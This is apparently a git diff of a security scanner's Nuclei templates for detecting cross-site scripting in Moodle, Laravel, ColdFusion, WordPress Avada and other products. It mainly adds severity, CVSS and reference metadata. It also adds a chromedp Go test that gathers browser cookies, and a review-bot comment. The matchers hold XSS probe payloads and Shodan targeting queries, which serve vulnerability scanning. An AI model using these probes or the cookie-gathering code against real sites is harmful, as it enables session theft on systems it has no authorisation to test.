    6  - severity: medium
     6 + severity: high
     7 + description: IBM Eclipse Help System 6.1.0 through 6.1.0.6, 6.1.5 through 6.1.5.3, 7.0 through 7.0.0.2, and 8.0 prior to 8.0.0.1 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
     8 + reference: https://packetstormsecurity.com/files/131924/IBM-Eclipse-Help-System-IEHS-Cross-Site-Scripting.html
     9 + classification:
     10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     11 + cvss-score: 7.2
     12 + cwe-id: CWE-79
    7 13   tags: ibm,xss
    8 14   
    9 15  requests:
    skipped 14 lines
    24 30   - "text/html"
    25 31   part: header
    26 32   
     33 +# Enhanced by md on 2022/09/19
     34 + 
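--- a/config/nuclei-templates/vulnerabilities/laravel/laravel-ignition-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/laravel/laravel-ignition-xss.yaml
@@ -1,16 +1,20 @@
 id: laravel-ignition-xss
 
 info:
- name: Laravel Ignition Cross-Site Scripting
+ name: Laravel Ignition - Cross-Site Scripting
  author: 0x_Akoko
- severity: medium
+ severity: high
  description: |
- Laravel's Ignition contains a cross-site scripting vulnerability when debug mode is enabled.
+ Laravel Ignition contains a cross-site scripting vulnerability when debug mode is enabled.
  remediation: |
- Disable Laravel's debug mode by setting APP_DEBUG to false.
+ Disable debug mode by setting APP_DEBUG to false.
  reference:
  - https://www.acunetix.com/vulnerabilities/web/laravel-ignition-reflected-cross-site-scripting/
  - https://github.com/facade/ignition/issues/273
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  tags: laravel,xss,ignition
 
 requests:
@@ -34,3 +38,5 @@
  status:
  - 500
 
+# Enhanced by md on 2022/09/19
+ 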
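--- a/config/nuclei-templates/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
@@ -1,12 +1,16 @@
 id: moodle-filter-jmol-xss
 
 info:
- name: Moodle filter_jmol - Cross-Site Scripting
+ name: Moodle Jsmol - Cross-Site Scripting
  author: madrobot
  severity: medium
- description: Cross-site scripting on Moodle.
+ description: Moodle contains a cross-site scripting vulnerability via the Jsmol plugin and may also be susceptible to local file inclusion or server-side-request forgery. An attacker can execute arbitrary script in the browser of an unsuspecting user and steal cookie-based authentication credentials and launch other attacks.
  reference:
  - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  tags: moodle,xss
 
 requests:
@@ -30,3 +34,5 @@
  words:
  - "text/html"
 
+# Enhanced by md on 2022/09/19
+ 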
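--- a/config/nuclei-templates/vulnerabilities/moodle/moodle-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/moodle/moodle-xss.yaml
@@ -1,12 +1,17 @@
 id: moodle-xss
 
 info:
- name: Moodle redirect_uri - Cross-Site Scripting
+ name: Moodle - Cross-Site Scripting
  author: hackergautam
  severity: medium
- description: XSS in moodle via redirect_uri parameter
+ description: Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, and earlier unsupported versions contain a cross-site scripting vulnerability via the redirect_uri parameter.
  reference:
  - https://twitter.com/JacksonHHax/status/1391367064154042377
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-32478
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  tags: moodle,xss
 
 requests:
@@ -32,3 +37,5 @@
  words:
  - "text/html"
 
+# Enhanced by md on 2022/09/19
+ 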
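--- a/config/nuclei-templates/vulnerabilities/netsweeper/netsweeper-rxss.yaml
+++ b/config/nuclei-templates/vulnerabilities/netsweeper/netsweeper-rxss.yaml
@@ -3,10 +3,16 @@
 info:
  name: Netsweeper 4.0.9 - Cross-Site Scripting
  author: daffainfo
- severity: medium
+ severity: high
+ description: Netsweeper 4.0.9 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
  - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- tags: xss,packetstorm,netsweeper
+ - https://www.exploit-db.com/exploits/37930
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
+ tags: edb,xss,packetstorm,netsweeper
 
 requests:
  - method: GET
@@ -29,3 +35,5 @@
  status:
  - 200
 
+# Enhanced by md on 2022/09/19
+ 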
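--- a/config/nuclei-templates/vulnerabilities/oracle/oracle-ebs-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/oracle/oracle-ebs-xss.yaml
@@ -1,11 +1,10 @@
 id: oracle-ebs-xss
 
 info:
- name: Oracle EBS - Cross-Site Scripting
+ name: Oracle E-Business Suite - Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  reference:
- - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
  - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
  - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
  tags: oracle,xss,ebs
@@ -32,3 +31,5 @@
  - "text/html"
  part: header
 
+# Enhanced by md on 2022/09/19
+ 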
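--- a/config/nuclei-templates/vulnerabilities/other/avada-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/avada-xss.yaml
@@ -1,13 +1,17 @@
 id: avada-xss
 
 info:
- name: Avada < 7.4.2 - Cross-Site Scripting
+ name: WordPress Avada Website Builder <7.4.2 - Cross-Site Scripting
  author: Akincibor
- severity: medium
- description: The theme does not properly escape bbPress searches before outputting them back as breadcrumbs, leading to a Reflected Cross-Site Scripting issue.
+ severity: high
+ description: WordPress Avada Website Builder prior to 7.4.2 contains a cross-site scripting vulnerability. The theme does not properly escape bbPress searches before outputting them back as breadcrumbs.
  reference:
  - https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb
  - https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  tags: xss,wp,wordpress,wp-theme,avada,wpscan
 
 requests:
@@ -33,3 +37,5 @@
  status:
  - 200
 
+# Enhanced by md on 2022/09/19
+ 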
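--- a/config/nuclei-templates/vulnerabilities/other/carrental-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/carrental-xss.yaml
@@ -1,14 +1,18 @@
 id: carrental-xss
 
 info:
- name: Car Rental Management System v1.0 - Stored Cross-Site Scripting
+ name: Car Rental Management System 1.0 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
- Car Rental Management System v1.0 is vulnerable to Cross Site Scripting via admin/ajax.php?action=save_category in Name and Description Parameter.
+ Car Rental Management System 1.0 contains a cross-site scripting vulnerability via admin/ajax.php?action=save_category in Name and Description parameter.
  reference:
  - https://www.exploit-db.com/exploits/49546
  - https://www.sourcecodester.com/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  metadata:
  verified: true
  shodan-query: http.html:"Car Rental Management System"
@@ -30,7 +34,6 @@
 
  ------WebKitFormBoundaryCMJ5bh3B6m9767Em
  Content-Disposition: form-data; name="id"
- 
 
  ------WebKitFormBoundaryCMJ5bh3B6m9767Em
  Content-Disposition: form-data; name="name"
@@ -65,3 +68,5 @@
  status:
  - 200
 
+# Enhanced by md on 2022/09/19
+ 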
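--- a/config/nuclei-templates/vulnerabilities/other/ckan-dom-based-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/ckan-dom-based-xss.yaml
@@ -1,12 +1,17 @@
 id: ckan-dom-based-xss
 
 info:
- name: CKAN DOM Based Cross-Site Scripting
+ name: Ckan - DOM Cross-Site Scripting
  author: dhiyaneshDk
- severity: medium
- description: CKAN uses the old jQuery Sparkle library which is vulnerable to DOM Based XSS.
+ severity: high
+ description: Ckan contains a cross-site scripting vulnerability in the document object model via the previous version of the jQuery Sparkle library. An attacker can execute arbitrary script and thus can steal cookie-based authentication credentials and launch other attacks.
  reference:
  - https://github.com/ckan/ckan/blob/b9e45e2723d4abd70fa72b16ec4a0bebc795c56b/ckan/public/base/javascript/view-filters.js#L27
+ - https://security.snyk.io/vuln/SNYK-PYTHON-CKAN-42010
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  tags: dom,xss
 
 requests:
@@ -29,3 +34,5 @@
  - 'text/html'
  part: header
 
+# Enhanced by md on 2022/09/20
+ 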
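--- a/config/nuclei-templates/vulnerabilities/other/coldfusion-debug-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/coldfusion-debug-xss.yaml
@@ -1,12 +1,16 @@
 id: coldfusion-debug-xss
 
 info:
- name: Adobe ColdFusion Debug Page Cross-Site Scripting
+ name: Adobe ColdFusion - Cross-Site Scripting
  author: dhiyaneshDK
- severity: medium
- description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site.
+ severity: high
+ description: Adobe ColdFusion debug page contains a cross-site scripting vulnerability when the application is running on a remote host. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
  - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  metadata:
  shodan-query: http.component:"Adobe ColdFusion"
  tags: adobe,coldfusion,xss
@@ -33,3 +37,5 @@
  status:
  - 200
 
+# Enhanced by md on 2022/09/20
+ 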
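--- a/config/nuclei-templates/vulnerabilities/other/devalcms-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/devalcms-xss.yaml
@@ -1,15 +1,22 @@
-id: devalcms-xss
+id: CVE-2008-6982
 
 info:
- name: Devalcms 1.4A - Cross-Site Scripting
+ name: Devalcms 1.4a - Cross-Site Scripting
  author: arafatansari
- severity: medium
+ severity: high
  description: |
- Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
+ Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
  reference:
  - https://www.exploit-db.com/exploits/6369
+ - https://www.cvedetails.com/cve/CVE-2008-6982
+ - https://nvd.nist.gov/vuln/detail/CVE-2008-6982
+ - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  metadata:
- verified: true
+ verified: "true"
  tags: devalcms,xss,cms,edb
 
 requests:
@@ -33,3 +40,5 @@
  status:
  - 500
 
+# Enhanced by md on 2022/09/20
+ 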
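--- a/config/nuclei-templates/vulnerabilities/other/discourse-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/discourse-xss.yaml
@@ -1,10 +1,17 @@
 id: discourse-xss
 
 info:
- name: Discourse CMS - Cross-Site Scripting
+ name: Discourse - Cross-Site Scripting
  author: madrobot
- severity: medium
- description: Cross-site scripting (XSS) on Discourse CMS
+ severity: high
+ description: Discourse contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
+ reference:
+ - https://www.cvedetails.com/vulnerability-list/vendor_id-20185/product_id-57316/opxss-1/Discourse-Discourse.html
+ - https://github.com/discourse/discourse/security/advisories/GHSA-xhmc-9jwm-wqph
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  tags: xss,discourse
 
 requests:
@@ -27,3 +34,5 @@
  - "text/html"
  part: header
 
+# Enhanced by md on 2022/09/20
+ 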
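--- a/config/nuclei-templates/vulnerabilities/other/dzzoffice-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/dzzoffice-xss.yaml
@@ -1,13 +1,17 @@
 id: dzzoffice-xss
 
 info:
- name: Dzzoffice 2.02.1_SC_UTF8 - Cross-Site Scripting
+ name: Dzzoffice 2.02.1 - Cross-Site Scripting
  author: arafatansari
- severity: medium
+ severity: high
  description: |
- A XSS vulnerability was discovered in dzzoffice 2.02.1_SC_UTF8, There is a Reflected XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.
+ Dzzoffice 2.02.1_SC_UTF8 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.
  reference:
  - https://github.com/zyx0814/dzzoffice/issues/183
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  metadata:
  verified: true
  shodan-query: http.html:"dzzoffice"
@@ -37,3 +41,5 @@
  status:
  - 200
 
+# Enhanced by md on 2022/09/20
+ 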
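--- a/config/nuclei-templates/vulnerabilities/other/empirecms-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/empirecms-xss.yaml
@@ -1,11 +1,17 @@
 id: empirecms-xss
 
 info:
- name: EmpireCMS v75 Cross-Site Scripting
+ name: EmpireCMS 7.5 - Cross-Site Scripting
  author: pikpikcu
- severity: medium
+ severity: high
+ description: EmpireCMS 7.5 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
  reference:
  - https://www.geek-share.com/detail/2777280260.html
+ - https://github.com/leadscloud/EmpireCMS/issues/4
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  tags: empirecms,xss
 
 requests:
@@ -24,3 +30,5 @@
  status:
  - 200
 
+# Enhanced by md on 2022/09/20
+ 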
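--- a/config/nuclei-templates/vulnerabilities/other/eris-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/eris-xss.yaml
@@ -1,11 +1,17 @@
 id: eris-xss
 
 info:
- name: Complete Online Job Search System v1.0 - Cross-Site Scripting
+ name: Complete Online Job Search System 1.0 - Cross-Site Scripting
  author: arafatansari
- severity: medium
+ severity: high
  description: |
- Complete Online Job Search System v1.0 is vulnerable to Reflected Cross Site Scripting via index.php?q=advancesearch.
+ Complete Online Job Search System 1.0 contains a cross-site scripting vulnerability via index.php?q=advancesearch.
+ reference:
+ - https://github.com/debug601/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-9.md
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  metadata:
  verified: true
  tags: cve,cve2022,xss,eris
@@ -37,3 +43,5 @@
  status:
  - 200
 
+# Enhanced by md on 2022/09/20
+ 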
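--- a/config/nuclei-templates/vulnerabilities/other/hospital-management-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/hospital-management-xss.yaml
@@ -1,11 +1,17 @@
 id: hospital-management-xss
 
 info:
- name: Hospital Management System v1.0 - Cross Site Scripting
+ name: Hospital Management System 1.0 - Cross-Site Scripting
  author: arafatansari
- severity: medium
+ severity: high
  description: |
- Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in doctor/search.php.
+ Hospital Management System 1.0 contains a cross-site scripting vulnerability via the searchdata parameter in doctor/search.php.
+ reference:
+ - https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-39411&scoretype=cvssv3
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  metadata:
  verified: true
  shodan-query: http.html:"Hospital Management System"
@@ -38,3 +44,5 @@
  - contains(body_2, 'Result against \"<script>alert(document.domain)</script>\" keyword')
  condition: and
 
+# Enhanced by md on 2022/09/20
+ 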
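--- a/config/nuclei-templates/vulnerabilities/other/hospital-management-xss2.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/hospital-management-xss2.yaml
@@ -1,11 +1,17 @@
 id: hospital-management-xss2
 
 info:
- name: Hospital Management System v1.0 - Cross Site Scripting
+ name: Hospital Management System 1.0 - Cross-Site Scripting
  author: arafatansari
- severity: medium
+ severity: high
  description: |
- Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in patient-search.php.
+ Hospital Management System 1.0 contains a cross-site scripting vulnerability via the searchdata parameter in patient-search.php.
+ reference:
+ - https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-39411&scoretype=cvssv3
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  metadata:
  verified: true
  shodan-query: http.html:"Hospital Management System"
@@ -38,3 +44,5 @@
  - contains(body_2, 'Result against \"<script>alert(document.domain)</script>\" keyword')
  condition: and
 
+# Enhanced by md on 2022/09/20
+ 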
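--- a/config/nuclei-templates/vulnerabilities/other/java-melody-xss.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/java-melody-xss.yaml
@@ -1,13 +1,17 @@
 id: java-melody-xss
 
 info:
- name: JavaMelody Monitoring - Cross-Site Scripting
+ name: JavaMelody - Cross-Site Scripting
  author: kailashbohara
- severity: medium
- description: Reflected cross site scripting (XSS) in JavaMelody monitoring.
+ severity: high
+ description: JavaMelody contains a cross-site scripting vulnerability via the monitoring parameter. An attacker can execute arbitrary script in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
  - https://github.com/Hurdano/JavaMelody-XSS
  - https://github.com/javamelody/javamelody/pull/555
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
  tags: xss,javamelody
 
 requests:
@@ -30,3 +34,5 @@
  status:
  - 200
 
+# Enhanced by md on 2022/09/20
+ 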
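--- a/spider/chromedp_test.go
+++ b/spider/chromedp_test.go
@@ -0,0 +1,53 @@
+package spider
+ 
+import (
+ "context"
+ "fmt"
+ "github.com/chromedp/cdproto/network"
+ "log"
+ "testing"
+ "time"
+ 
+ "github.com/chromedp/chromedp"
+)
+ 
+// https://github.com/chromedp/examples
+func Test_Name(t *testing.T) {
+ // create chrome instance
+ ctx, cancel := chromedp.NewContext(
+ context.Background(),
+ chromedp.WithLogf(log.Printf),
+ )
+ defer cancel()
+ 
+ // create a timeout
+ ctx, cancel = context.WithTimeout(ctx, 15*time.Second)
+ defer cancel()
+ 
+ // navigate to a page, wait for an element, click
+ var example string
+ err := chromedp.Run(ctx,
+ chromedp.Navigate(`https://www.baidu.com/`),
+ // // wait for footer element is visible (ie, page is loaded)
+ chromedp.WaitVisible(`body`),
+ // // find and click "Expand All" link
+ // chromedp.Click(`#pkg-examples > div`, chromedp.NodeVisible),
+ // // retrieve the value of the textarea
+ // chromedp.Value(`document.cookies`, &example),
+ chromedp.ActionFunc(func(ctx context.Context) error {
+ cookies, err := network.GetAllCookies().Do(ctx)
+ if err != nil {
+ return err
+ }
+ for _, cookie := range cookies {
+ example += fmt.Sprintf("%v", cookie) + ";"
+ }
+ return nil
+ }),
+ )
+ if err != nil {
+ log.Fatal(err)
+ }
+ fmt.Printf("Go's time.After example:\n%s", example)
+}
+ 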
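Review bot: `log.Fatal(err)` in Test_Name terminates the whole test binary instead of failing this one test, and the test drives a real headless Chrome against a live external host (`https://www.baidu.com/`), so it is non-hermetic and will fail or hang in any CI runner without Chrome and outbound network. Use the testing API for failure, `if err != nil { t.Fatal(err) }`, and guard the external dependency at the top of the function, `if testing.Short() { t.Skip("requires a local Chrome and outbound network access") }`. The final `fmt.Printf("Go's time.After example:\n%s", example)` looks like a leftover label from the chromedp example it was copied from; `t.Logf("cookies: %s", example)` would keep the output attached to the test and avoid writing every received cookie to stdout. The `github.com/chromedp/cdproto/network` import also sits inside the stdlib group; goimports would move it next to `github.com/chromedp/chromedp`.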